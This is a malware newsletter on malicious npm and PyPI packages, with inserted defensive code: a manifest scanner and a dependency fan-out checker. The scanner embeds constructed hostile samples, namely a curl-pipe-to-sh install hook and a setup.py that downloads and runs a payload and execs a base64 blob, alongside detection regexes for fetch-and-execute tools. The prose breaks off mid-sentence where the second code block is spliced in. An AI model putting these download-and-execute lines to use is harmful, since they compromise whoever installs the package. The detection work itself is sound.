In this edition of Malware Monthly, we take you on a journey through malware that rejects virtual machines, Linux crypto miners, evasive variants of RAT mutants, and a ubiquitous package dependent on the entire publicly available npm ecosystem — all targeted at modern software supply chains. Follow us as we continue to uncover suspicious activities in open source registries.
In terms of the volume of malware caught by our AI-enabled system, 2023 did not start quietly.
In January, we caught 691 malicious packages in the npm registry. A noticeable number of packages contained mentions of Yandex — the Russian search engine company. Packages including yandex-logger-sentry, yandex-logger-qloud, and yandex-sendsms attempt to exfiltrate information to a rogue server, which is possibly a bug bounty campaign against Yandex that relies on dependency confusion attacks.
We also caught 49 malicious packages in the PyPI registry last month. Notably, the packages reqsystem and httpxfaster, published by the same author (sexydev1337), contained heavily obfuscated code produced with hyperion — an obfuscator we see gaining popularity. Other examples of heavily obfuscated code include the aio6, gorilla2, httpsos, and pohttp packages. Additionally, the packages have and view execute a script that downloads and runs a malicious binary from an external server. In the case of have, some versions contain obfuscated code, and one version replaces Discord’s executable.
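The install-time behaviour described above (a setup script that fetches a remote binary and runs it, often wrapped in obfuscation) is something a registry consumer can screen for before installing. The following is an added example, not Sonatype's scanner or code from any of the packages named in this post: a heuristic check over an npm package.json and a PyPI setup.py that flags install hooks combining a network fetch with process execution, and long base64-looking literals as an obfuscation indicator. All package names, commands, the 203.0.113.5 address and the thresholds are constructed for illustration.

```python
"""Heuristic scan of package manifests for install-time download-and-execute
behaviour. Added example; every sample below is constructed, not real."""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Shell commands that fetch remote content, and commands that execute it.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|fetch)\b|https?://", re.I)
EXEC_RE = re.compile(r"\b(sh|bash|node|python3?|powershell|chmod\s+\+x)\b|\|\s*(sh|bash)\b", re.I)

# Python setup.py indicators: network fetch combined with process execution.
PY_FETCH_RE = re.compile(r"urllib\.request|urlopen|requests\.(get|post)|http\.client|socket\.")
PY_EXEC_RE = re.compile(r"subprocess\.|os\.system|os\.popen|exec\(|eval\(|os\.startfile")
# Long base64-looking literals are a common sign of an embedded, obfuscated payload.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{200,}")


def scan_npm_manifest(manifest_text: str) -> list[str]:
    """Return findings for the install hooks of an npm package.json string."""
    findings = []
    pkg = json.loads(manifest_text)
    name = pkg.get("name", "<unnamed>")
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in NPM_INSTALL_HOOKS:
            continue  # `test`, `build` etc. do not run on install
        fetch = bool(FETCH_RE.search(cmd))
        execute = bool(EXEC_RE.search(cmd))
        if fetch and execute:
            findings.append(f"{name}: {hook} hook downloads and executes ({cmd!r})")
        elif fetch:
            findings.append(f"{name}: {hook} hook reaches the network ({cmd!r})")
    return findings


def scan_setup_py(source: str) -> list[str]:
    """Return findings for a PyPI setup.py source string."""
    findings = []
    if PY_FETCH_RE.search(source) and PY_EXEC_RE.search(source):
        findings.append("setup.py: network fetch combined with process execution")
    blobs = B64_BLOB_RE.findall(source)
    if blobs:
        findings.append(
            f"setup.py: {len(blobs)} long base64-like literal(s) (possible obfuscated payload)"
        )
    return findings


# Constructed samples (not real packages).
BENIGN_NPM = json.dumps({
    "name": "example-lib",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"},
})
SUSPICIOUS_NPM = json.dumps({
    "name": "example-evil",
    "scripts": {"preinstall": "curl -s http://203.0.113.5/x.sh | sh"},
})
_BLOB = "QUFB" * 60  # constructed 240-character base64-looking literal
BENIGN_SETUP = "from setuptools import setup\nsetup(name='ok', version='1.0')\n"
SUSPICIOUS_SETUP = (
    "from setuptools import setup\n"
    "import base64, subprocess, urllib.request\n"
    'urllib.request.urlretrieve("http://203.0.113.5/payload", "/tmp/payload")\n'
    'subprocess.call(["/tmp/payload"])\n'
    f'exec(base64.b64decode("{_BLOB}"))\n'
    'setup(name="example-bad", version="0.1")\n'
)

if __name__ == "__main__":
    for label, result in (
        ("benign npm", scan_npm_manifest(BENIGN_NPM)),
        ("suspicious npm", scan_npm_manifest(SUSPICIOUS_NPM)),
        ("benign setup.py", scan_setup_py(BENIGN_SETUP)),
        ("suspicious setup.py", scan_setup_py(SUSPICIOUS_SETUP)),
    ):
        print(label, "->", result or "no findings")
```

The check is deliberately a triage heuristic: a single network call in an install hook is reported at lower severity, while fetch plus execute, or a large opaque literal, is what merits pulling the package for manual review rather than installing it.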
npm Packages Won’t be Left Behind
If you’ve uploaded your contributions to the npm registry, you might have noticed a dependent package that was common to all the other packages: no-one-left-behind by author Zalastax.
The package was published in 2018 and depended on every other known publicly available npm package. Talk about a next-level dependency hell situation. Here’s how the dependency graph looks:

Possibly inspired by hoarders, a self-described “utility grab-bag” package published in 2012 (at the time hoarders
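A package that depends on every other published package shows up as a dependent of everything, which is what the no-one-left-behind observation above amounts to. As an added example (not Sonatype's tooling, and the registry snapshot below is constructed apart from the no-one-left-behind name itself), the following walks an npm-style dependency map in both directions and flags any package whose transitive closure covers nearly the whole registry:

```python
"""Dependency fan-out check over a constructed npm-style registry snapshot.
Added example; package names other than no-one-left-behind are made up."""
from collections import deque

# Constructed snapshot: package name -> direct dependencies, as the
# "dependencies" field of each package.json would list them (versions omitted).
REGISTRY = {
    "left-pad": [],
    "is-odd": ["is-number"],
    "is-number": [],
    "web-app": ["left-pad", "is-odd"],
    # Depends on every other package in the snapshot, as the post describes.
    "no-one-left-behind": ["left-pad", "is-odd", "is-number", "web-app"],
}


def transitive_dependencies(name, graph):
    """Breadth-first walk returning every package reachable from `name`."""
    seen = set()
    queue = deque(graph.get(name, []))
    while queue:
        dep = queue.popleft()
        if dep in seen:
            continue
        seen.add(dep)
        queue.extend(graph.get(dep, []))
    return seen


def transitive_dependents(name, registry):
    """Every package that would pull `name` in, found by reversing the edges."""
    reverse = {}
    for pkg, deps in registry.items():
        for dep in deps:
            reverse.setdefault(dep, []).append(pkg)
    return transitive_dependencies(name, reverse)


def fan_out_ratio(name, registry):
    """Fraction of the other packages in the registry that `name` pulls in."""
    others = len(registry) - 1
    if others == 0:
        return 0.0
    return len(transitive_dependencies(name, registry) - {name}) / others


def flag_universal_dependents(registry, threshold=0.9):
    """Packages whose dependency closure covers at least `threshold` of the registry."""
    return sorted(n for n in registry if fan_out_ratio(n, registry) >= threshold)


if __name__ == "__main__":
    for pkg in REGISTRY:
        print(f"{pkg}: pulls in {sorted(transitive_dependencies(pkg, REGISTRY))}, "
              f"pulled in by {sorted(transitive_dependents(pkg, REGISTRY))}")
    print("near-universal dependents:", flag_universal_dependents(REGISTRY))
```

The reverse walk is the one that matters for a package author: it answers "who installs my package", and a name that appears in everyone's dependent list with a fan-out ratio near 1.0 is the pattern to look for when an unexpected dependent shows up.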